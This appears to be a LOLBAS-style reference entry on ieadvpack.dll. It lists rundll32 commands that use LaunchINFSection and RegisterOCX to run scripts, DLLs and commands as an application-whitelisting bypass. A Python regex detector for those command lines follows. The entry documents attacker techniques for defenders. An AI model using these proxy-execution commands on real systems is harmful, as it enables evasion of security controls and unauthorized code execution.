Ieadvpack.dll

INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.


Paths:


Resources:
https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
https://twitter.com/pabraeken/status/991695411902599168
https://twitter.com/0rbz_/status/974472392012689408

Acknowledgement:
Jimmy (LaunchINFSection) - @bohops
Fabrizio (RegisterOCX - DLL) - @0rbz_
Pierre-Alexandre Braeken (RegisterOCX - CMD) - @pabraeken


Detection:



AWL bypass

Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
Usecase:
Privileges required:User
OS:Windows
Mitre:T1085



Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,
Usecase:
Privileges required:User
OS:Windows
Mitre:T1085



Execute

Launch a DLL payload by calling the RegisterOCX function.
rundll32.exe ieadvpack.dll,RegisterOCX test.dll
Usecase:
Privileges required:User
OS:Windows
Mitre:T1085



Launch an executable by calling the RegisterOCX function.
rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
Usecase:
Privileges required:User
OS:
Mitre:T1085



Launch command line by calling the RegisterOCX function.
rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
Usecase:
Privileges required:User
OS:
Mitre:T1085
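
Detection sketch for the rundll32 invocations listed on this page, run over process-creation command lines. This is an added example, not part of the original entry or the LOLBAS project. The function name, the result fields and the sample lines are constructed for illustration, and matching advpack.dll as well rests on the assumption that it exposes the same two exports.

```python
import re

# rundll32 loading ieadvpack.dll (or advpack.dll, assumed here to expose the
# same exports) and calling LaunchINFSection or RegisterOCX. Tolerates a full
# path, quotes, a missing ".exe"/".dll", mixed case and padding around the comma.
PATTERN = re.compile(
    r"""\brundll32(?:\.exe)?["']?\s+
        ["']?(?:[^\s"',]*[\\/])?
        (?P<dll>(?:ie)?advpack)(?:\.dll)?["']?
        \s*,\s*
        (?P<export>LaunchINFSection|RegisterOCX)\b
        \s*(?P<args>.*)$""",
    re.IGNORECASE | re.VERBOSE,
)


def classify(cmdline):
    """Return a finding dict for a matching command line, else None."""
    m = PATTERN.search(cmdline.strip())
    if m is None:
        return None
    args = m.group("args").strip()
    if m.group("export").lower() == "launchinfsection":
        inf, _, rest = args.partition(",")
        # An empty section field means DefaultInstall is implied.
        section = rest.split(",")[0].strip() or "DefaultInstall"
        return {"export": "LaunchINFSection", "target": inf.strip(' "'),
                "detail": section}
    target = args.strip('"')
    if " " in target:
        kind = "command line"
    elif target.lower().endswith(".dll"):
        kind = "dll"
    else:
        kind = "executable"
    return {"export": "RegisterOCX", "target": target, "detail": kind}


# Constructed sample process-creation command lines (not real telemetry).
SAMPLES = [
    r'rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,',
    r'rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,',
    r'"C:\Windows\System32\rundll32.exe" D:\tmp\IEAdvpack.dll,RegisterOCX test.dll',
    r'rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"',
    r'rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), "<-", line)
```

For LaunchINFSection the script location sits inside the .inf file, so the command line alone does not show whether the .sct/.wsh is local or remote; the reported INF path is the artifact to collect and inspect.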